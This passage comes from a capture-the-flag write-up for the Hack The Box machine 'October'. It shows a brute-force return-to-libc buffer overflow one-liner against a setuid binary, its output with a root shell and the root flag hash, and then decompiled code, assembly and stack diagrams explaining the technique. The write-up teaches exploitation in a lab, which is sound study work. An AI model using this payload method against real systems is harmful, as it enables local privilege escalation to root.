</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span><span class="k">while </span><span class="nb">true</span><span class="p">;</span> <span class="k">do</span> /usr/local/bin/ovrflw <span class="si">$(</span>python <span class="nt">-c</span> <span class="s1">'print "\x90"*112 + "\x10\xe3\x5b\xb7" + "\x60\x12\x5b\xb7" + "\xac\x0b\x6e\xb7"'</span><span class="si">)</span><span class="p">;</span> <span class="nb">echo</span> <span class="nt">-n</span> <span class="s2">"Try </span><span class="nv">$i</span><span class="s2">:"</span><span class="p">;</span> <span class="nb">let</span> <span class="s2">"i++"</span><span class="p">;</span><span class="k">done

</span>Try 67:bash: <span class="o">[</span>16130: 1 <span class="o">(</span>255<span class="o">)]</span> tcsetattr: Inappropriate ioctl <span class="k">for </span>device
Try 68:bash: <span class="o">[</span>16130: 1 <span class="o">(</span>255<span class="o">)]</span> tcsetattr: Inappropriate ioctl <span class="k">for </span>device
Try 69:bash: <span class="o">[</span>16130: 1 <span class="o">(</span>255<span class="o">)]</span> tcsetattr: Inappropriate ioctl <span class="k">for </span>device
<span class="nb">whoami
</span>root
<span class="nb">cat</span> /root/root.txt
6bcb9cff749c9318d2a6e71bbcf30318
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="beyond-root">Beyond root</h1>
<h2 id="theory">Theory</h2>
<p>This is what the code looks like from ghidra:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre><span class="n">undefined4</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">param_1</span><span class="p">,</span><span class="n">undefined4</span> <span class="o">*</span><span class="n">param_2</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">char</span> <span class="n">local_74</span> <span class="p">[</span><span class="mi">112</span><span class="p">];</span>
  
  <span class="k">if</span> <span class="p">(</span><span class="n">param_1</span> <span class="o">&lt;</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Syntax: %s &lt;input string&gt;</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="o">*</span><span class="n">param_2</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="n">strcpy</span><span class="p">(</span><span class="n">local_74</span><span class="p">,(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">param_2</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>And this is what it looks in assembly code:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre><span class="mi">080484</span><span class="n">b5</span> <span class="mi">89</span> <span class="mi">44</span> <span class="mi">24</span> <span class="mo">04</span>     <span class="n">MOV</span>        <span class="n">dword</span> <span class="n">ptr</span> <span class="p">[</span><span class="n">ESP</span> <span class="o">+</span> <span class="n">local_8c</span><span class="p">],</span><span class="n">EAX</span>   <span class="c1">//copy the value in EAX to the address esp+local_8c</span>
<span class="mi">080484</span><span class="n">b9</span> <span class="mi">8</span><span class="n">d</span> <span class="mi">44</span> <span class="mi">24</span> <span class="mi">1</span><span class="n">c</span>     <span class="n">LEA</span>        <span class="n">EAX</span><span class="o">=&gt;</span><span class="n">local_74</span><span class="p">,[</span><span class="n">ESP</span> <span class="o">+</span> <span class="mh">0x1c</span><span class="p">]</span>		 <span class="c1">//copy the value at esp+0x1c to EAX</span>
<span class="mi">080484</span><span class="n">bd</span> <span class="mi">89</span> <span class="mo">04</span> <span class="mi">24</span>        <span class="n">MOV</span>        <span class="n">dword</span> <span class="n">ptr</span> <span class="p">[</span><span class="n">ESP</span><span class="p">]</span><span class="o">=&gt;</span><span class="n">local_90</span><span class="p">,</span><span class="n">EAX</span>	 <span class="c1">//copy EAX to the value at ESP</span>
<span class="mi">080484</span><span class="n">c0</span> <span class="n">e8</span> <span class="mi">7</span><span class="n">b</span> <span class="n">fe</span> <span class="n">ff</span> <span class="n">ff</span>  <span class="n">CALL</span>       <span class="n">strcpy</span>                           <span class="c1">//call strcpy</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<h2 id="how-stack-works">How Stack works?</h2>
<p>Stack allows a function to call another function, knowing that function could call any number of functions. Each time a function returns, it is able to put the state back as it is expected by the calling function.</p>

<p>When the call instruction is reached:</p>

<ol>
  <li>
    <p>Pushes the next instruction to the top of the stack (as the return address)</p>
  </li>
  <li>
    <p>Jumps execution to the new function. The next function is going to start with some common stuff, known as the prologue.</p>
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre> push   ebp          // push ebp on to the stack
 mov    ebp, esp     // copy esp to ebp
 sub    esp, 0x100   // subtract 0x100 from esp, creating a new frame
</pre></td></tr></tbody></table></code></pre></div>    </div>
    <p>Which makes a 0x100 frame between ESP and EBP after the prologue ends.</p>
  </li>
</ol>

<p>Lets see that:</p>
<ol>
  <li><code class="language-plaintext highlighter-rouge">call</code> pushes return address:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td> --><td class="rouge-code"><pre>            +-------------+
            |             |
            +-------------+
            |   ret addr  |  &lt;<span class="nt">--</span> ESP
            +-------------+
0xffffd100  |   copy to   |
            +-------------+
            |  copy from  |
            +-------------+
            |             |
            +-------------+
                  ...
            +-------------+
            |             |
            +-------------+
0xffffd188  |             |  &lt;<span class="nt">--</span> EBP
            +-------------+
</pre></td></tr></tbody></table></code></pre></div>    </div>
  </li>
  <li>Finally after the prologue stack looks like:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td> --><td class="rouge-code"><pre>            +-------------+
0xffffcef8  |             |  &lt;<span class="nt">--</span> ESP
            +-------------+
                  ...
            +-------------+
            |             |
            +-------------+
            |             |
            +-------------+
0xffffcff8  |  0xffffd188 |  &lt;<span class="nt">--</span> EBP
            +-------------+
            |   ret addr  |
            +-------------+
0xffffd100  |   copy to   |
            +-------------+
            |  copy from  |
            +-------------+
            |             |
            +-------------+
                  ...
            +-------------+
            |             |
            +-------------+
0xffffd188  |             |
            +-------------+
</pre></td></tr></tbody></table></code></pre></div>    </div>
  </li>
  <li>When a function is done, it will typically end with:
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>leave
ret
</pre></td></tr></tbody></table></code></pre></div>    </div>
    <p>leave == mov esp, ebp + pop ebp</p>
  </li>
</ol>

<p>Then when the return happens, the instruction pointer is popped, bringing that stack back to where it started (which we saw in step 1):</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td> --><td class="rouge-code"><pre>               +-------------+
               |  0xffffd188 |
               +-------------+
               |   ret addr  |
               +-------------+   
0xffffd100  |   copy to   |  &lt;<span class="nt">--</span> ESP
               +-------------+
               |  copy from  |
               +-------------+
               |             |
               +-------------+
                     ...
               +-------------+
               |             |
               +-------------+
0xffffd188  |             |  &lt;<span class="nt">--</span> EBP
               +-------------+
</pre></td></tr></tbody></table></code></pre></div></div>
<h2 id="theory-for-return-to-libc">Theory for Return to libc</h2>
<p>A return to libc attack involves overwriting the return address in such a way that the computer jumps to the function I want.</p>
<ul>
  <li>If I‚Äôve to call system(‚Äú/bin/sh‚Äù) , I would enter the function after the call but before the prologue. Stack looks something like this:
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>          +-------------+
          |   ret addr  |  &lt;-- ESP
          +-------------+
          |  "/bin/sh"  |
          +-------------+
          |             |
          +-------------+
                ...
                           &lt;-- EBP
</pre></td></tr></tbody></table></code></pre></div>    </div>
  </li>
  <li>Also the <code class="language-plaintext highlighter-rouge">system</code> is not reached via a <code class="language-plaintext highlighter-rouge">call</code> but a <code class="language-plaintext highlighter-rouge">ret</code>. Which means instead of EBP address before return address, if I put system address, <code class="language-plaintext highlighter-rouge">ret</code> will pop the system address into the instruction pointer (Step 3) and the stack will look right. Since I don‚Äôt know the right return address, I‚Äôll just use the function exit. So we overwrite the return address with a system address, add another ret address and add arguments after that.</li>
</ul>

<p>Now the stack looks like this when we reach return:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre>            +-------------+
            | system addr |  &lt;<span class="nt">--</span> ESP
            +-------------+
            |   ret addr  |
            +-------------+
            |  <span class="s2">"/bin/sh"</span>  |
            +-------------+
            |             |
            +-------------+
                  ...
                             &lt;<span class="nt">--</span> EBP
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Huge thanks to 0xdf for such a detailed writeup.
If you still don‚Äôt understand the Theory, give <a href="https://0xdf.gitlab.io/2019/03/26/htb-october.html#exploit">October</a> by 0xdf a read.</p>
:ET